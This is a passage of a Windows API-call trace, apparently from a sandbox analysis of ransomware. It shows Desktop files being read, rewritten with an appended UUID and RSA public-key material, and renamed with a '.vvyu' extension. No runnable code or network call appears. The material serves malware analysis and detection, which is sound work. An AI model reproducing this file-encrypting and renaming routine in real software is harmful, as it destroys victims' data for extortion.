[0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934f8 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4420 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4630 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2e914a8 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4848 [0192.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4630 | out: hHeap=0x620000) returned 1 [0192.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4848 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94c78 | out: hHeap=0x620000) returned 1 [0192.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4420 | out: hHeap=0x620000) returned 1 [0192.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0192.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.176] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0xd9a9, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0xd9a9, lpOverlapped=0x0) returned 1 [0192.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.177] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd9ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.177] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.178] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.178] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.179] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.179] CloseHandle (hObject=0x568) returned 1 [0192.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e96a68 [0192.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.181] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Bk2Yjoq3Rz.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\bk2yjoq3rz.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Bk2Yjoq3Rz.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\bk2yjoq3rz.bmp.vvyu")) returned 1 [0192.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.183] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.186] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa166e050, ftCreationTime.dwHighDateTime=0x1d89827, ftLastAccessTime.dwLowDateTime=0x16e79b70, ftLastAccessTime.dwHighDateTime=0x1d899b4, ftLastWriteTime.dwLowDateTime=0x16e79b70, ftLastWriteTime.dwHighDateTime=0x1d899b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bQ6SJi8RO0rg0dP", cAlternateFileName="BQ6SJI~1")) returned 1 [0192.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0192.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0192.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0192.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0192.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0192.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0192.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0192.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.188] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49860890, ftCreationTime.dwHighDateTime=0x1d8996f, ftLastAccessTime.dwLowDateTime=0x38492330, ftLastAccessTime.dwHighDateTime=0x1d8a727, ftLastWriteTime.dwLowDateTime=0x38492330, ftLastWriteTime.dwHighDateTime=0x1d8a727, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cc9_9V6aB.avi", cAlternateFileName="CC9_9V~1.AVI")) returned 1 [0192.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c78 [0192.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94c78 | out: hHeap=0x620000) returned 1 [0192.189] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\Cc9_9V6aB.avi") returned=".avi" [0192.189] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Cc9_9V6aB.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc9_9v6ab.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.189] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=15603) returned 1 [0192.189] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.193] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x3ccd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.193] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.195] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.195] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x3cf3, lpOverlapped=0x0) returned 1 [0192.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.195] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.196] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.196] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.196] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.196] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.196] GetLastError () returned 0x0 [0192.196] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.197] SetLastError (dwErrCode=0x0) [0192.197] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.198] SetLastError (dwErrCode=0x0) [0192.198] GetLastError () returned 0x0 [0192.199] SetLastError (dwErrCode=0x0) [0192.199] GetLastError () returned 0x0 [0192.199] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.199] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.199] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.199] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.199] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3cf0) returned 0x2e96a68 [0192.200] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c78 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c30 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.201] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e9a760 [0192.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9a980 [0192.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9a980 | out: hHeap=0x620000) returned 1 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93528 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93510 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9a760 | out: hHeap=0x620000) returned 1 [0192.204] GetCurrentThreadId () returned 0x66c [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e0b0 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.204] HeapFree (in: hHeap=0x620000, 